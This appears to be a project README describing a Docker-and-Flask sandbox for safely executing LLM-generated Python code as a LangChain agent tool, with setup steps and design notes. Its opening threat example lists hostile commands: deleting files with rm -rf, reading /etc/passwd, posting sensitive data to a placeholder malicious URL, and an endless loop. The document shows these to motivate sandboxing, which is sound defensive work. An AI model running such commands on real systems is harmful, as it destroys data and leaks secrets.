We demonstrate how to construct a Docker-based Python code interpreter that can be used as a LangChain agent tool for controlled and secure execution of LLM-generated Python code.
LangChain's experimental package provides the PythonREPLTool, which can be used to execute LLM-generated Python code locally. When using this tool, however, we face the security risks of arbitrary code execution, since the LLM could generate harmful code such as
# Potentially harmful operations
import os
import requests

os.system('rm -rf *') # Delete files
open('/etc/passwd').read() # Access sensitive files
requests.post('malicious-url', data=sensitive_data) # Data exfiltration
while True: pass # Resource exhaustion
and hence it is unsafe to run any LLM-generated code directly on the host machine without a suitable sandboxing mechanism.
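For context, the unsandboxed tool is used roughly like this (a minimal sketch; the import path is from the langchain_experimental package and may differ across LangChain versions):

# Unsandboxed: the generated code runs directly in the host Python process.
from langchain_experimental.tools import PythonREPLTool

repl = PythonREPLTool()
print(repl.invoke("print(2 + 2)"))  # nothing prevents harmful code from running here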
Cohere-Terrarium is a very interesting solution that provides a sandboxed environment for running LLM-generated Python code. Based on the Pyodide project, it allows Python code to be run locally or in the cloud inside a WASM interpreter. The primary limitation of this approach is that it is restricted to Pyodide-compatible packages: if the LLM generates code that requires a package that is not compatible with Pyodide, the code cannot be executed. (Pyodide does ship with micropip, so in theory the generated code could first use micropip to install missing packages, but there are several challenges here; for example, the LLM needs to be carefully prompted to stick to Pyodide-compatible packages and to handle installation of missing ones. My preliminary investigation found this to be challenging.)
Instead of trying to secure Python first with WASM and then with Docker, as Cohere-Terrarium does, the solution here simply protects the Python environment with Docker. This way, even if the LLM generates malicious code, it can only "break" the container, not the host system.
Here's how it works:
The LLM-generated code is sent over HTTP to a Flask server running inside a Docker container; the code executes there, and any files it creates are saved to the /workspace directory within the container.

The Docker sandbox uses a simple but effective API schema:
Input:
{
'code': str # Python code to execute
}
The code string is sent to the Flask server running in the Docker container. The output schema from the Flask server is as follows:
Output:
{
'success': bool, # Execution status
'output': str, # stdout/stderr content
'error': Optional[str], # Error message if any
'files': Optional[Dict[str, bytes]] # Base64 encoded files
}
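For illustration, here is a minimal sketch of the kind of Flask endpoint that could implement this schema inside the container (the /execute route name, the 30-second timeout, and the use of subprocess are assumptions, not the repo's exact code):

# Minimal sketch of a sandbox server implementing the schema above (assumed details).
import base64
import os
import subprocess
from flask import Flask, request, jsonify

app = Flask(__name__)
WORKSPACE = "/workspace"
os.makedirs(WORKSPACE, exist_ok=True)

@app.route("/execute", methods=["POST"])
def execute():
    code = request.get_json().get("code", "")
    try:
        # Run the code in a separate process, with a timeout to bound resource use.
        proc = subprocess.run(
            ["python", "-c", code],
            capture_output=True, text=True, timeout=30, cwd=WORKSPACE,
        )
        # Collect any files the code wrote to /workspace, base64-encoded for JSON transport.
        files = {}
        for name in os.listdir(WORKSPACE):
            path = os.path.join(WORKSPACE, name)
            if os.path.isfile(path):
                with open(path, "rb") as fh:
                    files[name] = base64.b64encode(fh.read()).decode("ascii")
        return jsonify({
            "success": proc.returncode == 0,
            "output": proc.stdout + proc.stderr,
            "error": proc.stderr if proc.returncode != 0 else None,
            "files": files or None,
        })
    except subprocess.TimeoutExpired:
        return jsonify({"success": False, "output": "", "error": "Execution timed out", "files": None})

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)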
The client.py file contains the code to parse the Flask server's response and return the code execution result back to the LangChain agent.
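As a sketch, run_python_code in client.py might look roughly like this (the endpoint URL and the exact error formatting are assumptions):

# Sketch of the client-side helper that the LangChain tool calls (assumed details).
import requests

SANDBOX_URL = "http://localhost:5000/execute"  # assumed endpoint

def run_python_code(code: str) -> str:
    resp = requests.post(SANDBOX_URL, json={"code": code}, timeout=60)
    result = resp.json()
    if result.get("success"):
        return result.get("output", "")
    # On failure, return the raw error text so the LLM can read it and self-correct.
    return "Execution failed:\n" + (result.get("error") or result.get("output", ""))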
The sandbox is exposed to LangChain as a Tool:
Tool(
name="python_code_interpreter",
func=run_python_code,
description="""A Python shell. Use this to execute python commands.
Input should be a valid python command.
If you want to see the output of a value, you should print it out with `print(...)`.
Always save files to '/workspace/' directory."""
)
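For completeness, one way this tool could be wired into an agent (a sketch assuming a ReAct-style agent and an OpenAI chat model; the repo's main.py may differ, and python_tool stands for the Tool instance defined above):

# Sketch: wiring the sandbox tool into a ReAct agent (model and prompt are assumptions).
from langchain import hub
from langchain.agents import create_react_agent
from langchain_openai import ChatOpenAI

llm = ChatOpenAI(model="gpt-4o-mini", temperature=0)  # model choice is an assumption
tools = [python_tool]                                 # the Tool instance shown above
prompt = hub.pull("hwchase17/react")                  # a standard ReAct prompt template
agent = create_react_agent(llm, tools, prompt)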
The sandbox provides several layers of protection:
Process Isolation: LLM-generated code executes inside the Docker container, not on the host.
File System Safety: files created by the code are confined to the /workspace directory.
Network Control: the container's network is managed by Docker and kept separate from the host; only the Flask server's port is published.
Package Management: commonly needed packages are pre-installed in the image:
RUN pip install numpy pandas matplotlib seaborn scikit-learn
Error Handling Simplicity: When it comes to error handling, simpler is better. Initially, I tried to be clever with custom error messages and complex error handling, but found that the simplest configuration works best:
agent_executor = AgentExecutor(
agent=agent,
tools=tools,
verbose=True,
handle_parsing_errors=True # This is the magic!
)
Just setting handle_parsing_errors=True and letting the raw stderr flow back to the LLM works amazingly well: the raw traceback gives the model enough context to correct its own code on the next attempt.
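A typical invocation then looks like this (the prompt text is only an example):

# The agent sees raw error output from the sandbox and retries with corrected code.
result = agent_executor.invoke({
    "input": "Create a CSV with 10 random numbers and save it to /workspace/data.csv"
})
print(result["output"])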
LLM Behavior Insights: you cannot predict everything the model will attempt (for example, poking around /etc)
without trying it, which is exactly why the generated code runs inside a container rather than on the host.
Sandbox Design Decisions: One of the trickiest parts of the Docker sandbox was figuring out how to get files in and out without mounting volumes (which could be a security risk). The solution used here is to return any files the code writes to /workspace base64-encoded in the JSON response (the files field in the output schema above), which the client then decodes and writes back to the host.
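A sketch of that client-side decoding step (the output directory name is an assumption):

# Decode base64-encoded files from the sandbox response and write them to the host.
import base64
import os

def save_returned_files(result: dict, out_dir: str = "sandbox_output") -> None:
    os.makedirs(out_dir, exist_ok=True)
    for name, b64_data in (result.get("files") or {}).items():
        with open(os.path.join(out_dir, os.path.basename(name)), "wb") as fh:
            fh.write(base64.b64decode(b64_data))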
Install dependencies:
pip install -r requirements.txt
Build and run Docker container:
cd python/tools/docker_python_sandbox
docker build -t python-sandbox .
docker run -p 5000:5000 python-sandbox
Set up environment variables:
export OPENAI_API_KEY=your_api_key
Run the application:
python python/main.py
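With the Docker container running, you can also smoke-test the sandbox directly from Python (the /execute endpoint path is an assumption):

# Quick smoke test against the sandbox server (assumes the /execute endpoint).
import requests

resp = requests.post(
    "http://localhost:5000/execute",
    json={"code": "print('hello from the sandbox')"},
)
print(resp.json())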
This project is licensed under the Apache License, Version 2.0.
No security solution is perfect. The code in this repo is provided as-is and without any guarantees. Always exercise caution when executing LLM-generated code.
This repo was created by Prakash Narayana Moorthy.